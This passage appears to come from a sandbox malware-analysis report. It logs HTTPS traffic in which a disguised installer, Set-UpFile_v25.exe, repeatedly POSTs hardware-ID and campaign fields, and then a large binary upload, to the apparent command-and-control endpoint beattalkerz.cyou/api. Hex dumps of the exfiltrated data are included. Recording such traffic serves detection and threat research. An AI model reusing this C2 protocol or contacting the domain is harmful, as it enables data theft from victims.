                                                                                                                                                              2025-01-07 13:37:16 UTC15331OUTData Raw: 2d 2d 42 37 47 44 50 47 50 4c 48 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 37 31 46 30 30 33 35 30 46 44 30 31 37 42 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31 0d 0a 2d 2d 42 37 47 44 50 47 50 4c 48 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 42 37 47 44 50 47 50 4c 48 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 42 37 47 44 50 47 50 4c 48 59 55 0d 0a 43 6f 6e 74 65
                                                                                                                                                              Data Ascii: --B7GDPGPLHYUContent-Disposition: form-data; name="hwid"C771F00350FD017B33642DA608956FF1--B7GDPGPLHYUContent-Disposition: form-data; name="pid"3--B7GDPGPLHYUContent-Disposition: form-data; name="lid"hRjzG3--ZINA--B7GDPGPLHYUConte
                                                                                                                                                              2025-01-07 13:37:16 UTC5063OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1
                                                                                                                                                              Data Ascii: lrQMn 64F6(X&7~`aO@
                                                                                                                                                              2025-01-07 13:37:21 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 07 Jan 2025 13:37:21 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=ijfodfcc5ian98c0s145t7ib7f; expires=Sat, 03 May 2025 07:23:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yMYPChR5HnKXeE5MRGqYpFNsN0d1nBwtr5su0UdtTB11EzdDUTQ3r7E5QewPzMB3HGgvexbBKJlIjfvgQgL8qc30MwdlYFuHY4%2BxTlhNTHr0EZ0qbxprDLrgH556V%2FyAkfrt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fe4576dd93a80e0-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1528&rtt_var=585&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21349&delivery_rate=1910994&cwnd=202&unsent_bytes=0&cid=43ca3ba7aed26fd2&ts=5400&x=0"
                                                                                                                                                              2025-01-07 13:37:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                              2025-01-07 13:37:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              5192.168.2.449754104.21.25.524437272C:\Users\user\Desktop\Set-UpFile_v25.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-07 13:37:22 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=8Z8YAVH559VDX1P
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 7111
                                                                                                                                                              Host: beattalkerz.cyou
                                                                                                                                                              2025-01-07 13:37:22 UTC7111OUTData Raw: 2d 2d 38 5a 38 59 41 56 48 35 35 39 56 44 58 31 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 37 31 46 30 30 33 35 30 46 44 30 31 37 42 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31 0d 0a 2d 2d 38 5a 38 59 41 56 48 35 35 39 56 44 58 31 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 5a 38 59 41 56 48 35 35 39 56 44 58 31 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 38 5a 38 59 41 56
                                                                                                                                                              Data Ascii: --8Z8YAVH559VDX1PContent-Disposition: form-data; name="hwid"C771F00350FD017B33642DA608956FF1--8Z8YAVH559VDX1PContent-Disposition: form-data; name="pid"1--8Z8YAVH559VDX1PContent-Disposition: form-data; name="lid"hRjzG3--ZINA--8Z8YAV
                                                                                                                                                              2025-01-07 13:37:23 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 07 Jan 2025 13:37:23 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=f2qagcki02g497gdudu3u2gpq0; expires=Sat, 03 May 2025 07:24:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QmW0IVzXdgvWHXN%2FGa3d2KvRnHyYLVZjY5QMQ%2ByprCzSZIWkss%2FvRh%2BoQQLJrbmn6YAj3jT%2BpuHV4qjleHVBfuRQEDXz9rcVH8dTx9LPa%2B0WsAVhSg0ghm7g5iqeT%2BXo0p9Y"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fe45795bba21899-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1530&min_rtt=1520&rtt_var=590&sent=5&recv=12&lost=0&retrans=0&sent_bytes=2840&recv_bytes=8025&delivery_rate=1823860&cwnd=153&unsent_bytes=0&cid=90b8a533f158c954&ts=783&x=0"
                                                                                                                                                              2025-01-07 13:37:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                              2025-01-07 13:37:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              6192.168.2.449755104.21.25.524437272C:\Users\user\Desktop\Set-UpFile_v25.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-07 13:37:24 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=DQ9HCLZXYVNW0P7R
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 1241
                                                                                                                                                              Host: beattalkerz.cyou
                                                                                                                                                              2025-01-07 13:37:24 UTC1241OUTData Raw: 2d 2d 44 51 39 48 43 4c 5a 58 59 56 4e 57 30 50 37 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 37 31 46 30 30 33 35 30 46 44 30 31 37 42 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31 0d 0a 2d 2d 44 51 39 48 43 4c 5a 58 59 56 4e 57 30 50 37 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 51 39 48 43 4c 5a 58 59 56 4e 57 30 50 37 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 44 51 39
                                                                                                                                                              Data Ascii: --DQ9HCLZXYVNW0P7RContent-Disposition: form-data; name="hwid"C771F00350FD017B33642DA608956FF1--DQ9HCLZXYVNW0P7RContent-Disposition: form-data; name="pid"1--DQ9HCLZXYVNW0P7RContent-Disposition: form-data; name="lid"hRjzG3--ZINA--DQ9
                                                                                                                                                              2025-01-07 13:37:24 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 07 Jan 2025 13:37:24 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=s397q57r5r7diuce45fg0rhj3i; expires=Sat, 03 May 2025 07:24:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DGcOTgdeZ6LZN%2FkaJqlo0Bl109LHzZajcUz8u7O4GWA%2F4seJj1ixX%2BtfJglw5iVf8%2F2vTjvizf9hDnkbSRohBfFABSy20%2F8lPbX%2FPSAzcobabkMAsMf9AtCf%2FsyOHbQ59YcA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fe4579ffe0b8c30-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=1983&rtt_var=802&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2156&delivery_rate=1316501&cwnd=218&unsent_bytes=0&cid=c6944622ed0f87d1&ts=451&x=0"
                                                                                                                                                              2025-01-07 13:37:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                              2025-01-07 13:37:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              7192.168.2.449756104.21.25.524437272C:\Users\user\Desktop\Set-UpFile_v25.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-07 13:37:26 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=DPCH7IOTRU
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 586472
                                                                                                                                                              Host: beattalkerz.cyou
                                                                                                                                                              2025-01-07 13:37:26 UTC15331OUTData Raw: 2d 2d 44 50 43 48 37 49 4f 54 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 37 31 46 30 30 33 35 30 46 44 30 31 37 42 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31 0d 0a 2d 2d 44 50 43 48 37 49 4f 54 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 50 43 48 37 49 4f 54 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 44 50 43 48 37 49 4f 54 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                              Data Ascii: --DPCH7IOTRUContent-Disposition: form-data; name="hwid"C771F00350FD017B33642DA608956FF1--DPCH7IOTRUContent-Disposition: form-data; name="pid"1--DPCH7IOTRUContent-Disposition: form-data; name="lid"hRjzG3--ZINA--DPCH7IOTRUContent-D
                                                                                                                                                              2025-01-07 13:37:26 UTC15331OUTData Raw: 31 76 28 bf f9 1f 5f b5 28 c6 85 0d e9 17 93 8e 5f 5b 35 eb dd d5 39 6c 8b 8c 8a aa e4 6d 93 59 6e 4e 13 dd 7a 45 4d 2a 71 d0 de 27 74 31 4b 15 1b 51 11 7f 9c 09 bc 0f 42 65 97 6a 66 4a af f1 e3 06 06 b7 f2 0a 89 8f 61 2f 75 c2 40 89 52 25 82 fe 3c bd d1 50 1b 33 74 e4 ec a4 76 f8 5f 1f f7 89 da 60 6e b7 f4 13 9c f9 9f 17 1e 9c 5a 33 9f 91 e9 aa 7a 90 ad 8e 66 4f ab 9b b2 df bf 4f 85 e8 3b 4c 85 6c e8 ab e6 1d 6c aa 9e a8 06 25 49 7b 42 0a ef ce b4 74 71 9e c9 af c0 0d f2 f7 40 5b 50 75 74 6f c2 69 ce 8e d9 42 93 30 f7 43 29 7b 71 d3 8c 21 17 37 1f e5 ae 55 de 10 de 86 f3 f9 eb eb 35 07 a9 e7 d9 e9 f3 3e 31 c2 00 e8 45 50 ad 51 29 34 cb 22 31 fa 4f f1 ee d5 93 7e cb 5f c2 73 40 8f b0 ef 6d dd 27 a0 a7 1a b0 83 77 af 27 1f fc e4 ba 9a 52 16 d8 e9 a6 c2 77
                                                                                                                                                              Data Ascii: 1v(_(_[59lmYnNzEM*q't1KQBejfJa/u@R%<P3tv_`nZ3zfOO;Lll%I{Btq@[PutoiB0C){q!7U5>1EPQ)4"1O~_s@m'w'Rw
                                                                                                                                                              2025-01-07 13:37:26 UTC15331OUTData Raw: 93 07 aa 98 c6 ad 58 22 61 23 15 84 db 40 fe ff f6 1e 92 f0 63 18 bb a0 5e d3 92 dc 1b af 28 36 0a ec 49 4d 2f 1b a1 e0 f9 d1 38 0e 50 fc 54 0c f6 e7 cd 94 76 df 78 72 98 a0 12 90 de c5 94 9b cd d6 b1 74 ae b3 36 42 89 7a 59 3c 8f e6 60 10 ec a6 ac 0d e5 bd 50 88 a6 0f 6d 81 45 8f 43 66 17 1b 24 05 75 dd ce bf 57 ba e0 b7 2f 52 48 ed 75 2a 8d f0 9d 96 99 01 27 f0 f9 42 d0 c9 8b aa bf ef b0 95 04 91 4c c2 20 ba c9 ee 72 1e e7 8a 18 36 b3 15 e6 17 7b bd 9e 04 f0 4d 5a df d9 ec fe 2a a0 5c 53 89 d5 5c f3 ea 7a 1a 6a e7 b2 31 f0 18 56 e6 74 9b 41 b7 4e 23 e6 f7 f2 38 8d b6 42 d4 7d 98 93 92 e7 49 1d 8c 48 2f de 18 c2 f3 88 6f 3c a2 ae 10 ef 43 87 4a 71 f6 79 06 70 fc de fc 43 a0 fc 5f 64 60 6c ce 17 47 ed 7d d1 f5 c3 db a5 37 a5 a3 c2 7d a7 ae 01 33 11 99 e5
                                                                                                                                                              Data Ascii: X"a#@c^(6IM/8PTvxrt6BzY<`PmECf$uW/RHu*'BL r6{MZ*\S\zj1VtAN#8B}IH/o<CJqypC_d`lG}7}3
                                                                                                                                                              2025-01-07 13:37:26 UTC15331OUTData Raw: af bb 4b 27 0e 18 46 85 ef 05 c7 0d 10 67 8c 8b f8 a2 83 ee 61 18 ab 23 cd f7 37 4c 12 8d c1 4a ca 45 d6 1f 3d 83 fe 63 a9 43 33 cf c3 57 a0 1c 64 f0 45 07 62 57 e2 76 f5 91 bb af 9a 6f 59 1b 3f 62 d8 74 04 79 00 41 c8 b9 e7 9c 5d 81 e2 ef ce aa a5 c1 5a 95 02 ce e9 01 21 b2 2f e7 28 7b 0c 05 c2 b3 5b 6a 25 32 2e ff 17 bf 3f ee dc f0 91 be f0 e5 93 f7 05 8b ce 81 2d 36 f3 82 e7 6b ee 0e 04 50 02 bc b6 2a f7 60 ab bb 2f d8 9f 8f aa 16 d5 2e 15 00 87 12 88 6c c8 75 5e da c4 6d a1 54 7e 9b 48 a9 2c c8 63 11 fd ea ee 44 c5 0b a7 54 f8 de de 04 9e f3 65 26 44 53 40 da 32 8c ec e7 86 37 53 e8 1b 91 77 38 27 21 de 04 78 e4 52 06 40 7e 27 88 df cd 7c b9 3c 7a 9e 20 fa 9c 61 a0 a7 2e 79 1f 52 5b 47 00 cd 00 0f 28 c4 c5 b2 da 06 58 4d 5e f0 29 88 90 fb b4 a8 84 27
                                                                                                                                                              Data Ascii: K'Fga#7LJE=cC3WdEbWvoY?btyA]Z!/({[j%2.?-6kP*`/.lu^mT~H,cDTe&DS@27Sw8'!xR@~'|<z a.yR[G(XM^)'
                                                                                                                                                              2025-01-07 13:37:26 UTC15331OUTData Raw: ad 1e 4c 2f 90 5a 5f 71 e5 49 7b 6b 5d 87 f9 09 a7 ae fa c3 68 28 ce 49 e4 b5 37 4f 28 bc d6 b4 c6 a3 d4 94 a2 22 d9 03 c2 f5 7c b9 22 38 45 3f a5 83 dc dc e8 10 47 e8 95 ec 3a 69 e5 f3 d2 1a 0d 2b 96 d4 9c 6b 2a f2 db 4d 62 0c 1a ea aa ba 95 50 df 19 79 4f cc 62 af 88 cb 04 1f aa b5 92 04 27 6e 34 5e da f1 16 98 73 dc 1b cd 76 84 be f6 c3 e7 fb eb 67 36 47 7e f4 e9 49 b1 e5 35 1a 69 33 2d fb b5 47 23 62 63 d2 18 3c a1 50 bc bc eb 97 fb 95 ab 65 2a 80 e6 aa 32 38 bd 04 99 55 87 db e5 a8 a8 e2 e7 43 db 57 d6 fc 46 db 36 2c 2b 5a d6 5e 6f ba c5 45 d6 ad ab 1d e4 49 54 51 19 68 dc 88 f7 38 24 92 66 c8 45 6d 03 f6 a6 79 9a a1 3f 47 47 b9 6d 40 0b 82 ff be a7 e2 30 c9 b4 82 13 f2 23 5a b4 f9 ee e0 aa 77 3a c9 21 af 96 2b c3 69 9d e2 49 3c 0c 88 17 88 2d 0e a2
                                                                                                                                                              Data Ascii: L/Z_qI{k]h(I7O("|"8E?G:i+k*MbPyOb'n4^svg6G~I5i3-G#bc<Pe*28UCWF6,+Z^oEITQh8$fEmy?GGm@0#Zw:!+iI<-
                                                                                                                                                              2025-01-07 13:37:26 UTC15331OUTData Raw: f6 b7 cc b3 be ed b6 fb 84 2e 00 4b c9 16 1d 05 6e 6c 4b e9 07 a1 47 d6 4d ba e4 5f a5 64 ef dc 14 16 9f 0a 2c de c2 6f ed 4f 1e 36 d9 9f 71 9d 58 5a af 2f 31 0e cd 0d dd 63 fa 2d 38 4b 05 69 39 b6 d4 e8 b9 e1 04 cf 56 a1 08 ee f2 d9 86 e1 c8 18 72 3d 6d 34 93 54 6d a7 ec 3e de ab 54 90 96 2f 34 4d 45 1b 4f f0 7c 2f f4 e2 ef 8d 74 57 d1 c8 da 23 a7 82 53 00 48 49 94 91 b8 3a f7 b2 00 df e7 93 e1 64 3e c1 77 44 a3 c9 c3 6b eb 80 40 52 fc fe 5c 0d 2e 8f 66 02 a4 eb 06 8a 0e 0f 2b 82 8c f9 0b eb f5 cc c3 36 ae 51 06 78 d6 e4 87 fc 8f 95 9d d0 cd e4 60 3e f4 30 3b f4 57 5c 2c 99 4e c2 2f e4 20 a1 06 ae 3e 35 3c 7e 93 d3 3d 31 c5 54 3e a8 d4 66 0d 47 83 69 99 ea 6f cc e2 96 80 89 16 5b c4 e0 5e c4 83 aa 3c 77 0a 65 6e f8 74 e5 74 f5 90 f2 8b 13 7b ca 1c 7b a6
                                                                                                                                                              Data Ascii: .KnlKGM_d,oO6qXZ/1c-8Ki9Vr=m4Tm>T/4MEO|/tW#SHI:d>wDk@R\.f+6Qx`>0;W\,N/ >5<~=1T>fGio[^<wentt{{
                                                                                                                                                              2025-01-07 13:37:26 UTC15331OUTData Raw: e8 d2 96 59 67 2f 7f b4 79 92 65 97 a7 58 b2 dc ac f3 b8 ef 6e 95 5e c9 6c 67 df 3f b6 77 4b be d6 fe fb e2 4e e9 81 92 c5 89 13 7b 49 dc 9e 96 7f aa b8 7f 86 f6 91 36 16 53 5a f0 0b 2f e4 40 77 0a df 00 0d 86 05 f9 f4 ab 36 af 09 81 14 26 58 f8 32 f6 fb 30 c8 c2 c0 eb 47 33 d4 09 26 80 94 05 61 50 28 11 b0 26 02 65 bf ea 57 fa 75 06 8d 94 52 f0 d7 96 e1 7b 6b 1c e0 bf 78 49 e4 c8 41 52 e6 e6 a5 be b4 0f aa df 77 0b 1a 60 43 60 f8 71 a3 cd 52 57 57 e5 9f f9 2b 42 2f 83 d9 3a d9 86 ef 23 59 1e 1e 1b 2e cf 1e 42 94 74 77 c6 61 30 63 e6 b1 03 08 f2 e3 9b 45 b7 9b 23 22 c3 eb 39 42 cd b7 0f 8b aa 11 91 25 b6 ef f8 e2 df 17 dd 88 ad ff c2 2b 52 50 e7 2e 58 0a ba 53 02 fc 71 f0 61 1c f1 ed 1e 22 1f ea cf 64 5a 16 bf f9 68 95 37 0f e3 e4 9b b1 34 3e 70 f9 07 3b
                                                                                                                                                              Data Ascii: Yg/yeXn^lg?wKN{I6SZ/@w6&X20G3&aP(&eWuR{kxIARw`C`qRWW+B/:#Y.Btwa0cE#"9B%+RP.XSqa"dZh74>p;
                                                                                                                                                              2025-01-07 13:37:26 UTC15331OUTData Raw: d6 d2 10 e9 39 2d 19 03 a7 68 ef c1 79 5b b2 8d d0 f4 e2 79 f7 f5 cb 01 2d b8 89 a1 69 56 b3 6b c0 fc ba 16 24 55 31 8f b6 fe dd a2 3f 95 b2 0f 84 49 b7 86 96 3c eb 72 76 79 59 a1 ff 62 b1 52 2f df 7a ee 45 c5 6a 93 50 a9 4f f1 56 99 1a b5 65 f0 51 40 d1 52 9b 52 54 4a 68 4b 38 67 a6 d8 b5 f3 d7 9c 6c ed 93 9a 2e 64 86 77 f9 ff 5e 6a 29 c9 b9 f5 99 d4 70 d0 01 4a 0c 3c e6 be 03 3c d4 74 e7 03 57 07 6a 9b d3 97 5a d6 f3 e3 c6 ce 19 4d b6 1c 72 0d d0 e8 ac 38 a4 12 a4 37 4f ea ae 6e 9b 78 58 65 06 42 41 c0 e0 2e bf cf ac 41 e8 3c 57 31 c2 17 be 06 6e c0 ff 96 6d 19 71 f2 b5 a7 95 36 f4 e0 5f 65 87 bc da cb 6c d8 95 8b 33 2c 93 25 0f eb c7 b4 a1 75 8f c5 7f e6 d5 b0 e0 b7 ac 9c b9 a2 86 00 de 8a 07 40 bc 2d 0e 9d eb 83 0b 15 84 78 0e 6f 65 9d f3 43 aa 19 ed
                                                                                                                                                              Data Ascii: 9-hy[y-iVk$U1?I<rvyYbR/zEjPOVeQ@RRTJhK8gl.dw^j)pJ<<tWjZMr87OnxXeBA.A<W1nmq6_el3,%u@-xoeC
                                                                                                                                                              2025-01-07 13:37:26 UTC15331OUTData Raw: 81 4e 5d 2b 4c c4 c2 fc 87 e2 c0 ac b6 c6 b7 84 3f 2c d8 f2 90 15 c9 02 d7 4f 3e 2c b5 74 84 5f 2b 57 25 0f 65 44 29 b5 8a 79 b4 6d 23 a2 d1 9c e6 62 4d 25 67 bb 39 ef e3 07 6b c8 72 cc d7 2a 56 c6 4f 1a d6 f7 1f 48 6a 7c b5 3b 6f 27 7a 3a cc 19 17 de ae f9 07 da 25 9a 7d dc f9 71 86 20 75 7b d2 23 f7 3f 98 2b a9 a9 4a 32 7f 56 2f 48 26 89 d1 1b d6 9b 83 f2 e2 d0 e6 18 db 5b 46 7b fa cd db 6b 36 c2 01 0a b3 6b dd 6d 86 0a d3 bb 68 86 f2 ba 63 44 53 6c 44 31 5e 4c f8 85 3c 2c c8 6d 81 da 35 f3 ac 20 a5 ae b0 e4 15 e9 27 4e 3a ef d4 d9 db 08 b5 7f 9c ef 2c ec 5a bd d5 4f 14 c2 fa c7 a5 62 3d 00 25 85 e9 10 51 17 a7 15 8f a5 c8 a2 5b 5b 9d 37 b8 20 a0 f4 cd 7c f5 1e f4 bb 47 90 59 6d c6 6e de 89 bb ce 26 fb bb b3 62 8d d5 25 b7 e9 61 a7 2e 17 f3 50 cb 03 06
                                                                                                                                                              Data Ascii: N]+L?,O>,t_+W%eD)ym#bM%g9kr*VOHj|;o'z:%}q u{#?+J2V/H&[F{k6kmhcDSlD1^L<,m5 'N:,ZOb=%Q[[7 |GYmn&b%a.P
